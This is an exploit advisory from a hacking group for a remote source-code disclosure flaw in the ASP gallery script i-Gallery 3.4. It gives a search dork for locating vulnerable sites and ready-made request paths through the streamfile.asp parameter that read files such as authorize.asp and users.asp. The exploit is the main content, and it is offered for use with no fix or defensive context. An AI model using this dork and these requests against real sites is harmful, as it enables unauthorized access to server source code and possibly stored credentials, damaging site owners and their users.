===========================================================
i-Gallery 3.4  asp Remote Source Code Disclosure Vulnerability 
-----------------------------------------------------------
foun by :kurdish hackers team
group : kurd-team
contact : pshela@yahoo.com
site : kurdteam.org
-----------------------------------------------------------
------------------------script-----------------------------
-----------------------------------------------------------
script name: i-Gallery 3.4 
site home : download : http://www.b-cp.com/igallery/download-count.asp
-----------------------------------------------------------
dork : Powered By: i-Gallery 3.4 

Exploit:
--------
/igallery/streamfile.asp?i=/[file you want].asp
live :
www.site.com/igallery/streamfile.asp?i=/authorize.asp
www.site.com/igallery/streamfile.asp?i=/users.asp
-----------------------------------------------------------
Zryan_kurd ,root-SyS , all  Member cold hackers team(cmg-team.com) , all kurdish hackers
-----------------------------------------------------------
================================================================